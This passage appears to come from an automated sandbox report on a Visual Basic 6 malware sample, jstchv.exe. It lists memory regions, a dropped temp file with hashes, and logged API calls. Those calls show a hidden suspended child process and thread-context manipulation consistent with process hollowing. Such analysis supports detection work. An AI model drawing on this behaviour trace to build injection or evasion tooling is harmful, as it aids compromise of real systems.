| private_0x0000000000270000 | 0x00270000 | 0x00276fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00284fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| ~df218c8dcc149bcb90.tmp | 0x002d0000 | 0x0034ffff | Memory Mapped File | rw |
|
|
|
|
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| jstchv.exe | 0x00400000 | 0x0049cfff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00627fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00900fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x01d0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x0210ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02110000 | 0x023defff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000023e0000 | 0x023e0000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023e0000 | 0x023e0000 | 0x0248ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002490000 | 0x02490000 | 0x0256efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025d0000 | 0x025d0000 | 0x027cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025d0000 | 0x025d0000 | 0x0264ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002650000 | 0x02650000 | 0x026d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027c0000 | 0x027c0000 | 0x027cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027d0000 | 0x027d0000 | 0x02bcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002bd0000 | 0x02bd0000 | 0x02fc2fff | Pagefile Backed Memory | r |
|
|
|
- |
| staticcache.dat | 0x02fd0000 | 0x038fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003900000 | 0x03900000 | 0x078fffff | Private Memory | rwx |
|
|
|
- |
| msvbvm60.dll | 0x72940000 | 0x72a92fff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x75040000 | 0x7509efff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x750a0000 | 0x750dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x750e0000 | 0x750f5fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\temp\~df218c8dcc149bcb90.tmp | 32.00 KB |
MD5:
e260b490de5edaa99db0519e15e94b5e
SHA1: ea3d6cb16609c739acc5a6443e3ba600befad114 SHA256: b7e6ad0ef263f205af9d169d8e03b73ca4df16b95fc40742d3934db27625ec3d SSDeep: 3:YmsalTlLPltl2N81HRJ//:rl912N0xJX |
|
|
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors | - |
|
2 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe | os_pid = 0x578, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 |
Thread (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\windows\syswow64\mshta.exe | os_tid = 0x144 |
|
1 | |
| Set Context | c:\windows\syswow64\mshta.exe | os_tid = 0x144 |
|
1 | |
| Resume | c:\windows\syswow64\mshta.exe | os_tid = 0x144 |
|
1 |
Module (139)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | OLEAUT32.DLL | base_address = 0x76720000 |
|
1 | |
| Load | SXS.DLL | base_address = 0x75040000 |
|
1 | |
| Load | gdi32.dll | base_address = 0x76a70000 |
|
1 | |
| Load | user32 | base_address = 0x77820000 |
|
2 | |
| Load | kernel32 | base_address = 0x76220000 |
|
20 | |
| Load | shell32 | base_address = 0x76b00000 |
|
1 | |
| Load | ntdll | base_address = 0x77e20000 |
|
4 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76220000 |
|
2 | |
| Get Handle | c:\users\aetadzjz\appdata\local\temp\jstchv.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x76720000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x75cf0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x77820000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\jstchv.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe, size = 260 |
|
3 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\jstchv.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
3 | |
| Get Filename | c:\users\aetadzjz\appdata\local\temp\jstchv.exe | process_name = c:\users\aetadzjz\appdata\local\temp\jstchv.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsTNT, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x76235235 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = OleLoadPictureEx, address_out = 0x767870a1 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = DispCallFunc, address_out = 0x76733dcf |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = LoadTypeLibEx, address_out = 0x767307b7 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = UnRegisterTypeLib, address_out = 0x76751ca9 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = CreateTypeLib2, address_out = 0x76738e70 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromUdate, address_out = 0x76737684 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarUdateFromDate, address_out = 0x7673cc98 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = GetAltMonthNames, address_out = 0x7676903a |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNumFromParseNum, address_out = 0x76736231 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarParseNumFromStr, address_out = 0x76735fea |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDecFromR4, address_out = 0x76743f94 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDecFromR8, address_out = 0x76744e9e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDecFromDate, address_out = 0x7676db72 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDecFromI4, address_out = 0x76752a8c |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDecFromCy, address_out = 0x7676d737 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromDec, address_out = 0x7676e015 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = GetRecordInfoFromTypeInfo, address_out = 0x7676cc3d |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = GetRecordInfoFromGuids, address_out = 0x7676d1c4 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayGetRecordInfo, address_out = 0x7676d48c |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArraySetRecordInfo, address_out = 0x7676d4c6 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayGetIID, address_out = 0x7676d509 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArraySetIID, address_out = 0x7673e7bb |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayCopyData, address_out = 0x7673e496 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayAllocDescriptorEx, address_out = 0x7673ddf1 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayCreateEx, address_out = 0x7676d53f |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarFormat, address_out = 0x76772055 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarFormatDateTime, address_out = 0x767720ea |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarFormatNumber, address_out = 0x76772151 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarFormatPercent, address_out = 0x767721f5 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarFormatCurrency, address_out = 0x76772288 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarWeekdayName, address_out = 0x76772335 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMonthName, address_out = 0x767723d5 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x76745934 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x76745a98 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCat, address_out = 0x767459b4 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x7679e405 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarEqv, address_out = 0x7679ef07 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x7679f00a |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarImp, address_out = 0x7679ef47 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x7679f15e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x7679dbd4 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x7679ecfa |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarPow, address_out = 0x7679ea66 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x7679d332 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x7679ee2e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAbs, address_out = 0x7679ca11 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarFix, address_out = 0x7679cc5f |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarInt, address_out = 0x7679cde7 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x7679c802 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x7679ec66 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarRound, address_out = 0x7679d155 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x7673b0dc |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDecAdd, address_out = 0x76755f3e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDecCmp, address_out = 0x76744fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrCat, address_out = 0x76740d2c |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyMulI4, address_out = 0x767559ed |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrCmp, address_out = 0x7672f8b8 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstanceEx, address_out = 0x75d39d4e |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CLSIDFromProgIDEx, address_out = 0x75d00782 |
|
1 | |
| Get Address | c:\windows\syswow64\sxs.dll | function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75087685 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x77837d2f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MonitorFromWindow, address_out = 0x77843150 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MonitorFromRect, address_out = 0x7785e7a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MonitorFromPoint, address_out = 0x77845281 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EnumDisplayMonitors, address_out = 0x7784451a |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMonitorInfoA, address_out = 0x77844413 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EnumFontsA, address_out = 0x76aac3c9 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EnumWindows, address_out = 0x7783d1cf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x76231856 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x7623110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x762310ff |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetErrorMode, address_out = 0x76231b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x762311a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAllocEx, address_out = 0x7624d9b0 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetCursorPos, address_out = 0x77841218 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x76231410 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteW, address_out = 0x76b13c71 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x76231282 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnmapViewOfFile, address_out = 0x76231826 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x76233f5c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7624d802 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtectEx, address_out = 0x762b45bf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessInternalW, address_out = 0x76243bf3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempPathW, address_out = 0x7624d4dc |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLongPathNameW, address_out = 0x7623a315 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSize, address_out = 0x7623196e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x76233ed3 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtProtectVirtualMemory, address_out = 0x77e40028 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x76235223 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtGetContextThread, address_out = 0x77e40c20 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtSetContextThread, address_out = 0x77e41910 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtResumeThread, address_out = 0x77e40058 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeProcess, address_out = 0x7624174d |
|
1 |
Window (17)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderRT6Main, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = VBMsoStdCompMgr, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = VBFocusRT6, wndproc_parameter = 0 |
|
1 | |
| Create | quechan7 | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | FRIGORIFICAL | wndproc_parameter = 0 |
|
1 | |
| Set Attribute | - | class_name = VBMsoStdCompMgr, index = 0, new_long = 2695324 |
|
1 |
Keyboard (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 |
System (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 630, y_out = 383 |
|
2 | |
| Sleep | duration = 2000 milliseconds (2.000 seconds) |
|
1 | |
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 182957 |
|
1 | |
| Get Time | type = Ticks, time = 184970 |
|
1 | |
| Register Hook | type = WH_MSGFILTER, hookproc_address = 0x729a1e09 |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | - |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #14: jstchv.exe
124
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\users\aetadzjz\appdata\local\temp\jstchv.exe |
| Command Line | C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe" |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Local\Temp\ |
| Monitor | Start Time: 00:02:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:54, Reason: Self Terminated |
| Monitor Duration | 00:00:46 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x578 |
| Parent PID | 0x8d0 (c:\users\aetadzjz\appdata\local\temp\jstchv.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
348
0x
2B0
0x
9B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0018bfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0005ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a6fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b4fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001e9fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003d3fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003f3fff | Private Memory | rwx |
|
|
|
- |
| jstchv.exe | 0x00400000 | 0x0049cfff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000400000 | 0x00400000 | 0x00429fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00459fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00477fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| locale.nls | 0x004a0000 | 0x00506fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00777fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00900fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x01d0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x0210ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02110000 | 0x023defff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000023e0000 | 0x023e0000 | 0x025fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023e0000 | 0x023e0000 | 0x025affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023e0000 | 0x023e0000 | 0x024dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002570000 | 0x02570000 | 0x025affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025c0000 | 0x025c0000 | 0x025fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002600000 | 0x02600000 | 0x065fffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000006600000 | 0x06600000 | 0x06780fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006600000 | 0x06600000 | 0x0671cfff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000006790000 | 0x06790000 | 0x06a92fff | Private Memory | rwx |
|
|
|
- |
| msvbvm60.dll | 0x72940000 | 0x72a92fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
